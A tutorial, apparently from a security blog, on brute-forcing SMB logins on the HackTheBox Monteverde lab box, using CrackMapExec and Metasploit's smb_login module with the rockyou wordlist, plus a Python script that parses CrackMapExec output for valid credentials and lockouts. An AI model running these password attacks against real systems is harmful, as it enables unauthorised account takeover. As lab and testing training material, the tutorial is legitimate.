INTRO
Recently I was working on an HTB box named Monteverde. When I started enumerating, I found a few open ports, among them an SMB service and a WinRM service. Enumerating SMB gave me a list of users, but no password for any of them. In that situation I turned to a tool named CrackMapExec. It performs dictionary attacks against SSH, WinRM, HTTP, MSSQL and SMB. Some people call dictionary attacks brute-force attacks, and I am one of them. What you call it is not important; what matters is performing the attack.
It was quite a simple CTF, and I could have used Metasploit, Ncrack or Hydra to brute-force SMB or any other service. But I had only just heard about this tool and had never used it before, so I decided to try it and learn something new. It was a good decision.
Today I will show you how to brute-force SMB with Metasploit and how to use the CrackMapExec tool. Before starting, I recommend that you take a look back at these earlier articles on:
One more thing: I am using Kali Linux. If you are using another Linux distribution, you may run into errors while installing CrackMapExec.
ATTACK
1. Crackmapexec Method
I have already told you how I found this tool. Now, without further talk, let's take a look at it. CrackMapExec does not come pre-installed on Kali Linux, so we have to install it. You can go to its GitHub page and install it manually (all the instructions are provided there), and if you are on another OS the GitHub page is the place to start.
Kali Linux users can paste the following command into the terminal:
apt-get install crackmapexec
Installation can take some time, and the first run takes a little extra time as well.
To use this tool, open your terminal and type this command:
crackmapexec --help
This command shows the help section of the CrackMapExec tool.
OUTPUT:
optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            set how many concurrent threads to use (default: 100)
  --timeout TIMEOUT     max timeout in seconds of each thread (default: None)
  --jitter INTERVAL     sets a random delay between each connection (default: None)
  --darrell             give Darrell a hand
  --verbose             enable verbose output

protocols:
  available protocols

  {ssh,mssql,http,winrm,smb}
    ssh                 own stuff using SSH
    mssql               own stuff using MSSQL
    http                own stuff using HTTP
    winrm               own stuff using WINRM
    smb                 own stuff using SMB
As you can see, there are several protocols to attack. To run a dictionary attack against one of them you need a wordlist.
I am using rockyou.txt (it contains most of the simple passwords you will ever meet), purely for demonstration; in your case you can use a custom one. Keep in mind that rockyou.txt has roughly 14 million entries. Against a domain-joined Windows host with an account lockout policy, throwing that many passwords at each user will lock every account after a handful of failures. In a real assessment, find out the lockout threshold first (CrackMapExec's smb --pass-pol option dumps the password policy once you have one valid login) and try only a few passwords per user at a time.
Type this command to start the attack on the SMB service:
crackmapexec smb 10.10.10.172 -u /root/Desktop/users.txt -p /root/Desktop/rockyou.txt
Where:
smb is the protocol; you can replace it with any other protocol from the help output.
-u takes either a single username or the path to a file of usernames.
-p takes either a single password or the path to a password file.
With a file for both, CrackMapExec tries every user against every password. Add -d DOMAIN to authenticate against the domain rather than the local machine, and in recent versions add --continue-on-success if you want it to keep going after the first valid pair instead of stopping there.
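A run like the one above produces one line per login attempt, and on a large wordlist most of it scrolls past. The script below is an added example (not part of the original article or of the CrackMapExec project) that parses that output, pulls out the valid credentials, and flags accounts that hit STATUS_ACCOUNT_LOCKED_OUT or are close to a lockout threshold. The column layout follows what cme prints for the smb protocol; the sample lines, the CORP.LOCAL domain, the usernames and the passwords are constructed for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of CrackMapExec "smb" login output. Same columns cme
# prints (protocol, host, port, hostname, status, DOMAIN\user:password,
# NT status on failure); domain, users and passwords are hypothetical.
SAMPLE_OUTPUT = """\
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:CORP.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] CORP.LOCAL\\alice:123456 STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] CORP.LOCAL\\alice:password STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [+] CORP.LOCAL\\bob:Winter2020
SMB         10.10.10.172    445    MONTEVERDE       [-] CORP.LOCAL\\carol:123456 STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] CORP.LOCAL\\carol:password STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.172    445    MONTEVERDE       [+] CORP.LOCAL\\admin:Summer2020 (Pwn3d!)
"""

# One login-attempt line. Banner/info lines ("[*]") do not match and are
# skipped. Passwords containing whitespace are not handled by this pattern.
LINE_RE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+"
    r"\[(?P<status>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:]+):(?P<password>\S*)"
    r"(?:\s+(?P<reason>STATUS_\w+))?(?:\s+\((?P<pwned>Pwn3d!)\))?"
)


@dataclass(frozen=True)
class Attempt:
    host: str
    domain: str
    user: str
    password: str
    success: bool
    admin: bool      # cme appends "(Pwn3d!)" when the account is a local admin
    reason: str      # NT status string on failure, "" on success


def parse_cme_output(text: str) -> list[Attempt]:
    """Turn raw cme smb output into one Attempt per login line."""
    attempts: list[Attempt] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        attempts.append(Attempt(
            host=m["host"],
            domain=m["domain"],
            user=m["user"],
            password=m["password"],
            success=m["status"] == "+",
            admin=m["pwned"] is not None,
            reason=m["reason"] or "",
        ))
    return attempts


def valid_credentials(attempts: list[Attempt]) -> list[tuple[str, str, str, bool]]:
    """(domain, user, password, is_admin) for every successful login, in order."""
    return [(a.domain, a.user, a.password, a.admin) for a in attempts if a.success]


def locked_out_users(attempts: list[Attempt]) -> list[str]:
    """Users the DC reported as locked out during this run."""
    return sorted({a.user for a in attempts if a.reason == "STATUS_ACCOUNT_LOCKED_OUT"})


def failed_attempts_per_user(attempts: list[Attempt]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for a in attempts:
        if not a.success:
            counts[a.user] = counts.get(a.user, 0) + 1
    return counts


def users_over_budget(attempts: list[Attempt], lockout_threshold: int) -> list[str]:
    """Users with lockout_threshold - 1 or more failures in this run: one more
    bad password locks them (or already has). Stop spraying these accounts."""
    failures = failed_attempts_per_user(attempts)
    return sorted(u for u, n in failures.items() if n >= lockout_threshold - 1)


if __name__ == "__main__":
    parsed = parse_cme_output(SAMPLE_OUTPUT)
    for domain, user, password, admin in valid_credentials(parsed):
        print(f"valid: {domain}\\{user}:{password}{' (admin)' if admin else ''}")
    print("locked out:", locked_out_users(parsed))
    print("at risk (threshold 3):", users_over_budget(parsed, 3))
```

In practice you would pipe the real run into this (crackmapexec ... | tee cme.log, then feed the log file to parse_cme_output) and stop the spray as soon as locked_out_users or users_over_budget returns anything, which is the check the lockout caveat above asks for.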
2. Metasploit Method
Metasploit is a well-known and powerful framework. We will use it to brute-force SMB.
First of all, start Metasploit with this command:
msfconsole
Then select the auxiliary module and list its options:
use auxiliary/scanner/smb/smb_login
show options
Now set the options:
set USER_FILE /root/Desktop/users.txt
set PASS_FILE /root/Desktop/rockyou.txt
set RHOSTS 10.10.10.172
Where:
USER_FILE is the path to the username file.
PASS_FILE is the path to the password file.
RHOSTS is the IP address of the target (here the Monteverde box).
You can also change RPORT if SMB is not on port 445. For a domain-joined target set SMBDomain to the domain name, and set STOP_ON_SUCCESS to true if you only want the first valid pair; the BLANK_PASSWORDS and USER_AS_PASS options cover two cases that a wordlist alone misses.
Then type run
or exploit
to start the attack. There are other modules for the same kind of attack against other services, such as auxiliary/scanner/ssh/ssh_login for SSH (and therefore SFTP, which runs over SSH) and auxiliary/scanner/ftp/ftp_login for FTP.
Stay home, stay safe and keep reading our articles.
Thanks For Visiting.